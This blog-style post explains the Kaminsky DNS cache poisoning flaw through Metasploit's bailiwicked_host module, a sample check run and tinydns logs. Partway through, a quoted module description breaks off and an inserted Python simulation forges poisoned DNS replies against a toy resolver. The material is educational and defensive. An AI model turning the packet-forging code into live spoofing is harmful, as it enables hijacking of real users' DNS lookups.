As some of you may have heard, there is a new DNS cache poisoning exploit in the wild. Currently there are two exploits available, one for a domain and the other for a hostname. The basic idea is described in the module files:
This exploit targets a fairly ubiquitous flaw in DNS implementations
which allows the insertion of malicious DNS records into the cache of the
target nameserver. This exploit caches a single malicious host entry
into the target nameserver. By causing the target nameserver to query
for random hostnames at the target domain, the attacker can spoof a
response to the target server including an answer for the query, an
authority server record, and an additional record for that server,
causing the target nameserver to insert the additional record into the
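To make the three-record trick in the module description concrete, here is an added example (my own toy model, not code from the original post or from Metasploit). It forges the answer/authority/additional reply in raw DNS wire format, feeds it to a minimal resolver that applies the usual bailiwick rule, and races a fixed-source-port resolver against one that randomises its port. The zone, the server names and the 198.51.100.66 address are constructed for the illustration, and the resolver is deliberately simplified (no compression pointers, no real network).

```python
"""Toy model of a Kaminsky-style poisoning round.  Added example, not code from
the original post or from Metasploit; names, addresses and resolver logic are
constructed for illustration only."""
import random
import struct

A, NS = 1, 2                     # RR type codes
ATTACKER_IP = "198.51.100.66"    # constructed (TEST-NET-2) address the attacker wants cached

def encode_name(name):
    """Dotted name -> DNS wire labels (no compression pointers, keeps the parser tiny)."""
    out = b"".join(bytes([len(l)]) + l.encode() for l in name.rstrip(".").split("."))
    return out + b"\x00"

def a_rdata(ip):
    return bytes(int(o) for o in ip.split("."))

def rr(name, rtype, rdata, ttl=86400):
    """NAME TYPE CLASS=IN TTL RDLENGTH RDATA."""
    return encode_name(name) + struct.pack("!HHIH", rtype, 1, ttl, len(rdata)) + rdata

def build_poison_response(txid, qname, zone, ns_name, ns_ip):
    """Forge the reply from the module text: an answer for the random name, an
    authority record saying `zone` is served by `ns_name`, and an additional
    (glue) A record mapping ns_name to the attacker's address."""
    header = struct.pack("!HHHHHH", txid, 0x8400, 1, 1, 1, 1)   # QR=1 AA=1; 1 Q, 1 AN, 1 NS, 1 AR
    question = encode_name(qname) + struct.pack("!HH", A, 1)
    return (header + question
            + rr(qname, A, a_rdata("192.0.2.1"))     # throwaway answer for the random name
            + rr(zone, NS, encode_name(ns_name))     # authority: zone NS ns_name
            + rr(ns_name, A, a_rdata(ns_ip)))        # additional: ns_name A <attacker>

def read_name(buf, off):
    labels = []
    while buf[off]:
        n = buf[off]
        labels.append(buf[off + 1:off + 1 + n].decode())
        off += 1 + n
    return ".".join(labels), off + 1

def parse_response(pkt):
    """Return (txid, qname, [(section, name, type, rdata), ...])."""
    txid, _flags, qd, an, ns, ar = struct.unpack("!HHHHHH", pkt[:12])
    assert qd == 1
    qname, off = read_name(pkt, 12)
    off += 4                                         # skip QTYPE, QCLASS
    records = []
    for section, count in (("answer", an), ("authority", ns), ("additional", ar)):
        for _ in range(count):
            name, off = read_name(pkt, off)
            rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
            off += 10
            records.append((section, name, rtype, pkt[off:off + rdlen]))
            off += rdlen
    return txid, qname, records

def in_bailiwick(name, zone):
    """Bailiwick rule: only records at or below the zone being queried get cached."""
    return name == zone or name.endswith("." + zone)

class ToyResolver:
    """Caches in-bailiwick records from a reply whose TXID, port and question match."""
    def __init__(self, fixed_port=None, rng=random):
        self.cache, self.pending, self.fixed_port, self.rng = {}, None, fixed_port, rng

    def send_query(self, qname, zone):
        txid = self.rng.getrandbits(16)
        port = self.fixed_port or self.rng.randint(1024, 65535)   # unpatched: one fixed port
        self.pending = (txid, port, qname, zone)
        return txid, port

    def receive(self, pkt, dst_port):
        txid, qname, records = parse_response(pkt)
        if self.pending is None or (txid, dst_port, qname) != self.pending[:3]:
            return False                                          # not the reply we are waiting for
        zone = self.pending[3]
        for _section, name, rtype, rdata in records:
            if in_bailiwick(name, zone):                          # glue for ns1.<zone> passes this test
                self.cache[(name, rtype)] = rdata
        self.pending = None
        return True

def rounds_to_poison(fixed_port, guesses_per_round=500, max_rounds=2000, seed=0,
                     zone="example.com", ns_name="ns1.example.com"):
    """Kaminsky race: every round asks for a fresh random name (no TTL to wait out)
    and the attacker sprays `guesses_per_round` forged replies with guessed TXIDs
    and destination ports.  Returns the round that poisoned the cache, or None."""
    rng = random.Random(seed)
    resolver = ToyResolver(fixed_port, rng)
    for rnd in range(1, max_rounds + 1):
        qname = "%08x.%s" % (rng.getrandbits(32), zone)
        resolver.send_query(qname, zone)
        for _ in range(guesses_per_round):
            pkt = build_poison_response(rng.getrandbits(16), qname, zone, ns_name, ATTACKER_IP)
            port_guess = fixed_port or rng.randint(1024, 65535)
            if resolver.receive(pkt, port_guess):
                assert resolver.cache[(ns_name, A)] == a_rdata(ATTACKER_IP)
                return rnd
        resolver.pending = None          # real answer arrived first; try the next random name
    return None

if __name__ == "__main__":
    print("fixed source port: poisoned in round", rounds_to_poison(fixed_port=53))
    print("random source port: poisoned in round", rounds_to_poison(fixed_port=None, max_rounds=200))
```

With a fixed source port the attacker only has to hit the 16-bit TXID, so the cache is poisoned within a few hundred rounds of 500 guesses each; with a random port the search space is roughly 2^32 and the run exhausts its cap. The glue for ns1.example.com is cached only because its owner name sits under example.com, which is exactly why the forged additional record has to be in-bailiwick.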
Metasploit (the latest from their SVN) includes each exploit, which makes it easy to test and attempt the exploit against your own servers. Luckily my name servers are running TinyDNS, which does not have this flaw. For example:
msf auxiliary(bailiwicked_host) > check
[*] Using the Metasploit service to verify exploitability...
[*] UNKNOWN: This server did not reply to our vulnerability check requests
You will see some requests in your DNS logs that look like this (tinydns query log format: timestamp, client address:port:query-id in hex, a result code, the query type in hex, then the name; 0010 is TXT, and the - means tinydns refused the query because red.metasploit.com is not one of its zones, which is why the check comes back UNKNOWN rather than with a verdict):
2008-07-25 14:26:45.896813500 3ff6167e:373a:0009 - 0010 spoofprobe-check-1-11391593674.red.metasploit.com
2008-07-25 14:26:55.899392500 3ff6167e:373a:000a - 0010 spoofprobe-check-2-1139140392.red.metasploit.com
2008-07-25 14:27:05.903259500 3ff6167e:373a:000b - 0010 spoofprobe-check-3-11391648643.red.metasploit.com
So yeah, if you aren't running TinyDNS, patch your name servers!
More info at hackaday and Dan Kaminsky's blog.